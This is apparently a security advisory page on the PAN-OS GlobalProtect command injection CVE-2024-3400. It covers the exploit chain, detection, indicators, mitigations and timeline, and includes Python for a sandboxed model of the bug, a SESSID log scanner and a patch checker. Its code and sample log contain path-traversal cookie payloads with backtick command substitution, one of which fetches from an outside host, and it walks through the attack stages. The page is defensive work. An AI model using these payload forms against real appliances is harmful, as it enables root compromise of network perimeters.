TP-EXP-2024-0001 CVE-2024-3400 critical Patched Certified

Palo Alto PAN-OS GlobalProtect Command Injection (CVE-2024-3400)

CVE CVE-2024-3400
Platform Palo Alto Networks PAN-OS 10.2, 11.0, 11.1
Type Command Injection
Severity CRITICAL
Status Patched
Zero-Day Confirmed
Disclosed April 12, 2024
Patched April 14, 2024
Days in the Wild 26
Researcher Volexity
CISA KEV Listed

Severity Assessment

  • Exploitability: 10/10 — Unauthenticated, remotely exploitable with no user interaction required
  • Impact: 10/10 — Full root-level command execution on the firewall appliance
  • Weaponization Risk: Critical — Active exploitation in the wild prior to disclosure; proof-of-concept exploits widely available
  • Patch Urgency: Critical — CISA added to KEV catalog with BOD 22-01 remediation deadline
  • Detection Coverage: Medium — Volexity provided IOCs and detection guidance; behavioral detection requires careful log analysis

CVSS 3.1 Base Score: 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Executive Summary

CVE-2024-3400 is a critical command injection vulnerability in the GlobalProtect feature of PAN-OS, the operating system of Palo Alto Networks firewall appliances. An unauthenticated remote attacker can execute arbitrary commands with root privileges on the firewall. It affects PAN-OS 10.2, 11.0 and 11.1 firewalls configured as a GlobalProtect gateway or portal. Palo Alto Networks initially stated that device telemetry also had to be enabled for exploitation, but later updated its advisory to say that exploitation does not depend on the telemetry setting.

The vulnerability was discovered by Volexity while investigating suspicious network activity at a customer site in early April 2024. Analysis revealed a state-sponsored threat actor (tracked as UTA0218) had been exploiting the vulnerability as a zero-day since at least March 17, 2024 — approximately 26 days before public disclosure. Palo Alto Networks released emergency patches within 48 hours of disclosure, and CISA immediately added the CVE to the Known Exploited Vulnerabilities (KEV) catalog.

Exploit Chain

Stage 1: Arbitrary File Creation via SESSID Cookie Path Traversal

The attacker sends a crafted HTTP request to a GlobalProtect endpoint with a specially constructed SESSID cookie value. PAN-OS builds a filesystem path from the session identifier without sanitizing it, so a value containing ../ sequences walks out of the session directory and causes an empty file to be created at an attacker-chosen location. The attacker controls the file name, and the file name itself carries the payload.

Stage 2: Command Injection via Telemetry Cron Job

PAN-OS’s device telemetry feature includes a scheduled cron job that periodically collects files from specific directories and embeds their names in a shell command. When the file created in Stage 1 lands in one of those directories and its name contains shell command substitution syntax, the shell evaluates the embedded command when the job runs. The job runs as root, so the injected command executes with root privileges.
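
To make the two stages concrete, here is an added model (example code, not PAN-OS code and not anything published by Palo Alto Networks or Volexity) that reproduces the class of bug in miniature: a session id spliced into a path without checks, and a collector that hands file names to a shell. The directory names, the session id format and the curl command line are assumptions of the model, and every file it creates lives under a scratch directory. The hardened variant of each stage sits beside the vulnerable one.

```python
import os
import posixpath
import re
import tempfile
from urllib.parse import unquote

# Hypothetical directory layout for this model. It is not PAN-OS's real layout,
# and every path is rooted under a scratch directory so nothing real is touched.
SESSION_SUBDIR = "tmp/sslvpn"
TELEMETRY_SUBDIR = "opt/panlogs/tmp/device_telemetry/minute"

# Assumed canonical shape of a legitimate session id (hypothetical).
SESSID_RE = re.compile(r"[A-Za-z0-9]{32}")


def setup_root():
    """Create the scratch 'appliance filesystem' the models write into."""
    root = tempfile.mkdtemp(prefix="panos-model-")
    os.makedirs(os.path.join(root, SESSION_SUBDIR))
    os.makedirs(os.path.join(root, TELEMETRY_SUBDIR))
    return root


def session_path_vulnerable(root, sessid):
    """Stage 1, vulnerable model: the decoded cookie value is spliced straight
    into a path, so '../' components walk out of the session directory."""
    return os.path.join(root, SESSION_SUBDIR) + "/" + unquote(sessid)


def session_path_hardened(root, sessid):
    """Stage 1, hardened model: allow only canonical ids, then re-check that the
    normalized path is still inside the session directory. Either check alone
    stops this bug; keeping both survives future changes to the id format."""
    sessid = unquote(sessid)
    if not SESSID_RE.fullmatch(sessid):
        raise ValueError("malformed session id")
    base = os.path.join(root, SESSION_SUBDIR)
    path = posixpath.normpath(posixpath.join(base, sessid))
    if posixpath.commonpath([base, path]) != base:
        raise ValueError("session id escapes the session directory")
    return path


def create_session_file(root, sessid, hardened):
    """Model of the gateway creating an empty per-session file.
    Returns the normalized path of the file that was created."""
    if hardened:
        path = session_path_hardened(root, sessid)
    else:
        path = session_path_vulnerable(root, sessid)
    with open(path, "w"):
        pass
    return posixpath.normpath(path)


def telemetry_command_vulnerable(path):
    """Stage 2, vulnerable model: the collected file's path is interpolated into
    one command string that a cron job hands to a shell (shell=True). Backticks
    or $(...) in the file name are evaluated by that shell, as root."""
    return f"curl -s -F file=@{path} https://telemetry.invalid/upload"


def telemetry_command_hardened(path):
    """Hardened model: pass an argv list and never involve a shell. The file
    name stays one opaque argument whatever bytes it contains."""
    return ["curl", "-s", "-F", "file=@" + path, "https://telemetry.invalid/upload"]


def demo():
    """Run both models against one constructed cookie value and report."""
    root = setup_root()
    # Constructed payload: traversal into the telemetry directory, with a file
    # name that carries a command substitution. The model never executes it.
    payload = "/../../" + TELEMETRY_SUBDIR + "/x`id`"
    created = create_session_file(root, payload, hardened=False)
    session_dir = os.path.join(root, SESSION_SUBDIR) + "/"
    try:
        create_session_file(root, payload, hardened=True)
        blocked = False
    except ValueError:
        blocked = True
    return {
        "created": created,
        "escaped_session_dir": not created.startswith(session_dir),
        "hardened_blocked": blocked,
        "shell_command": telemetry_command_vulnerable(created),
        "argv": telemetry_command_hardened(created),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the script shows the vulnerable path landing inside the telemetry directory with the backticks intact in the file name, which is exactly the string the vulnerable collector would pass to a shell; the hardened functions reject the cookie at Stage 1 and, even if a hostile name reached Stage 2, would pass it as a single argv element with no shell to interpret it.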

Stage 3: Reverse Shell and Persistence

In observed exploitation, UTA0218 used the command injection to establish a reverse shell, then deployed a Python-based backdoor called UPSTYLE. The backdoor provided persistent remote access and was configured to listen for commands embedded in specially crafted HTTP requests to the firewall’s web interface.

Stage 4: Lateral Movement into Internal Network

From the compromised firewall — which sits at the network perimeter — the attacker pivoted into the victim’s internal network. Observed activities included credential harvesting from Active Directory, exfiltration of sensitive data, and deployment of additional tools on internal systems.

Detection Guidance

Log-based detection:

  • Monitor GlobalProtect gateway logs for HTTP requests containing anomalous SESSID cookie values, particularly those with path traversal sequences (../)
  • Check PAN-OS system logs for unexpected cron job executions or modifications
  • Review filesystem integrity for unexpected files in telemetry-related directories

Network-based detection:

  • Alert on outbound connections from PAN-OS management interfaces to unknown external IPs
  • Monitor for reverse shell traffic originating from firewall appliances
  • Inspect HTTP traffic to GlobalProtect endpoints for oversized or malformed cookie headers

Behavioral indicators:

  • Unexpected Python processes running on PAN-OS appliances
  • Configuration export or credential access commands executed outside maintenance windows
  • New or modified files in /opt/panlogs/tmp/device_telemetry/ directories
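
As an added example of the first log-based item above (not code from this page's sources), the following scanner applies the SESSID checks to constructed access-log lines: it strips repeated percent-encoding, then flags traversal components, absolute paths, references to the telemetry directory, shell metacharacters, and oversized or non-canonical values. The log layout, the endpoint paths and the 16 to 64 character alphanumeric shape assumed for a benign session id are assumptions; adjust them to your own log source.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines in a generic access-log layout with the request's
# Cookie header appended as the last quoted field. The real GlobalProtect log
# format differs; adapt LINE_RE to whatever your log pipeline emits.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Apr/2024:09:12:01 +0000] "POST /ssl-vpn/login.esp HTTP/1.1" 200 512 "SESSID=a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6"
203.0.113.77 - - [10/Apr/2024:09:13:44 +0000] "POST /ssl-vpn/login.esp HTTP/1.1" 200 0 "SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/x`curl http://198.51.100.5/a`"
203.0.113.77 - - [10/Apr/2024:09:13:45 +0000] "POST /ssl-vpn/login.esp HTTP/1.1" 200 0 "SESSID=%2F..%2F..%2F..%2Fopt%2Fpanlogs%2Ftmp%2Fdevice_telemetry%2Fminute%2Fx"
198.51.100.200 - - [10/Apr/2024:09:20:05 +0000] "GET /global-protect/portal/css/login.css HTTP/1.1" 200 3011 "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<cookies>[^"]*)"$'
)
SESSID_RE = re.compile(r'(?:^|;\s*)SESSID=([^;]*)')
LEGIT_SESSID = re.compile(r'[A-Za-z0-9]{16,64}')      # assumed benign shape
TRAVERSAL = re.compile(r'(?:^|/)\.\.(?:/|$)')
SHELL_META = re.compile(r'[`$;|&<>]')


def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding (%252e -> %2e -> .) before inspection."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_sessid(raw):
    """Return the reasons a SESSID value looks hostile; empty list if benign."""
    value = decode_fully(raw)
    reasons = []
    if TRAVERSAL.search(value):
        reasons.append("path traversal")
    if value.startswith("/"):
        reasons.append("absolute path")
    if "device_telemetry" in value:
        reasons.append("telemetry directory reference")
    if SHELL_META.search(value):
        reasons.append("shell metacharacters")
    if len(raw) > 128:
        reasons.append("oversized cookie")
    if not reasons and not LEGIT_SESSID.fullmatch(value):
        reasons.append("non-canonical session id")
    return reasons


def scan(log_text):
    """Parse each line, pull the SESSID cookie, and collect flagged requests."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        c = SESSID_RE.search(m["cookies"])
        if not c:
            continue
        reasons = classify_sessid(c.group(1))
        if reasons:
            hits.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"],
                         "sessid": c.group(1), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["path"], ", ".join(hit["reasons"]))
```

Decoding before matching matters: the third sample line carries the same traversal as the second but fully percent-encoded, and a pattern applied to the raw cookie would miss it. The "non-canonical session id" reason is deliberately last and weakest; tune LEGIT_SESSID to the shape of real sessions on your appliances before alerting on it.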

Indicators of Compromise

Network Indicators

  • Outbound connections from PAN-OS appliances to attacker C2 infrastructure
  • HTTP requests to GlobalProtect with SESSID cookies containing ../ path traversal sequences
  • POST requests to the firewall’s web management interface containing encoded commands

File Indicators

  • UPSTYLE backdoor Python script on PAN-OS filesystem
  • Unexpected files in /opt/panlogs/tmp/device_telemetry/hour/atp/
  • Modified cron job configurations in PAN-OS system directories

Host Indicators

  • Unexpected Python processes with network listeners on PAN-OS
  • Attacker commands embedded in entries of /var/log/pan/sslvpn_ngx_error.log, which UPSTYLE reads as its command channel
  • Running configuration exports initiated outside normal change windows

Pre-Patch Mitigations

Palo Alto Networks provided the following mitigations prior to patch availability:

  • Disable device telemetry: Initially recommended as a way to break the chain at Stage 2 when the GlobalProtect gateway could not be disabled. Palo Alto Networks later updated its advisory to state that disabling telemetry is not an effective mitigation, because exploitation does not depend on it; do not rely on this step
  • Apply Threat Prevention signature: Palo Alto Networks released Threat Prevention signature Threat ID 95187, which blocks exploitation attempts at the network level when a Vulnerability Protection profile is applied to the GlobalProtect interface
  • Restrict GlobalProtect access: Limit GlobalProtect gateway access to known IP ranges where possible

Post-patch requirements:

  • Update to PAN-OS 10.2.9-h1, 11.0.4-h1, or 11.1.2-h3 (or later)
  • After patching, perform a thorough compromise assessment — patching alone does not remove existing backdoors
  • Reset all credentials accessible from the firewall appliance
  • Review firewall configurations for unauthorized changes
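
To check appliances against the fixed releases listed above, here is an added helper (example code, not a Palo Alto Networks tool) that parses PAN-OS version strings, including -hN hotfix suffixes, compares them per release train, and reads the sw-version field out of captured show system info output. The sample CLI output is constructed, and the fixed-release table holds only the three versions named on this page; Palo Alto Networks also shipped hotfixes for earlier maintenance releases, so extend the table from the vendor advisory before trusting a "not patched" verdict for an older maintenance release.

```python
import re

# Fixed releases listed on this page, keyed by release train. Extend from the
# vendor advisory: hotfixes also exist for earlier maintenance releases, and a
# version below the entry here is not necessarily vulnerable.
FIXED_RELEASES = {
    "10.2": "10.2.9-h1",
    "11.0": "11.0.4-h1",
    "11.1": "11.1.2-h3",
}

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_version(text):
    """Turn '11.1.2-h3' into a comparable tuple (11, 1, 2, 3).
    A release without a hotfix suffix compares as hotfix 0, so 10.2.9 < 10.2.9-h1."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {text!r}")
    major, minor, maint, hotfix = m.groups()
    return (int(major), int(minor), int(maint), int(hotfix or 0))


def assess(version_text):
    """Classify one sw-version string against the fixed releases above."""
    version = parse_version(version_text)
    train = f"{version[0]}.{version[1]}"
    if train not in FIXED_RELEASES:
        return {"version": version_text, "train": train,
                "affected_train": False, "patched": None, "fixed_in": None}
    fixed = FIXED_RELEASES[train]
    return {"version": version_text, "train": train, "affected_train": True,
            "patched": version >= parse_version(fixed), "fixed_in": fixed}


def sw_version_from_show_system_info(output):
    """Extract the sw-version field from 'show system info' CLI output."""
    for line in output.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() == "sw-version":
            return value.strip()
    raise ValueError("no sw-version line found")


# Constructed sample of the relevant lines from 'show system info'.
SAMPLE_SYSTEM_INFO = """\
hostname: fw-edge-01
model: PA-850
sw-version: 10.2.8-h1
"""


def assess_show_system_info(output):
    """Convenience wrapper: version check straight from captured CLI output."""
    return assess(sw_version_from_show_system_info(output))


if __name__ == "__main__":
    for v in ("10.2.9-h1", "10.2.9", "11.1.3", "11.0.3-h10", "10.1.9"):
        print(v, assess(v))
    print(assess_show_system_info(SAMPLE_SYSTEM_INFO))
```

The comparison is a plain tuple comparison, so a later maintenance release in the same train (11.1.3) reads as patched while the base release without the hotfix (10.2.9) does not; trains outside the three affected ones return patched=None rather than a false sense of coverage.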

Disclosure Timeline

2024-03-17 — Earliest Known Exploitation

Retrospective analysis by Volexity identified exploitation activity dating back to at least March 17, 2024, approximately 26 days before public disclosure.

2024-04-10 — Volexity Discovers Exploitation

Volexity researchers detected suspicious activity on a customer’s Palo Alto Networks firewall during an incident response engagement and began analysis.

2024-04-12 — Public Disclosure and Advisory

Palo Alto Networks published Security Advisory PAN-SA-2024-0015 confirming the vulnerability and active exploitation. CISA added CVE-2024-3400 to the Known Exploited Vulnerabilities catalog the same day.

2024-04-14 — Emergency Patches Released

Palo Alto Networks released hotfix patches for affected PAN-OS versions: 10.2.9-h1, 11.0.4-h1, and 11.1.2-h3.

2024-04-15 — Proof-of-Concept Exploits Published

Multiple proof-of-concept exploits were published publicly, increasing the risk of mass exploitation. Scanning activity for vulnerable GlobalProtect instances surged.

2024-04-17 — CISA BOD 22-01 Deadline

Federal civilian agencies required to apply patches or mitigations per CISA’s Binding Operational Directive 22-01 remediation timeline.

Sources & References

  1. Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400) — Volexity, 2024-04-12
  2. CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Gateway — Palo Alto Networks, 2024-04-12
  3. CISA Adds CVE-2024-3400 to Known Exploited Vulnerabilities Catalog — CISA, 2024-04-12
  4. Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 — Palo Alto Unit 42, 2024-04-12
  5. NVD - CVE-2024-3400 — NIST NVD, 2024-04-12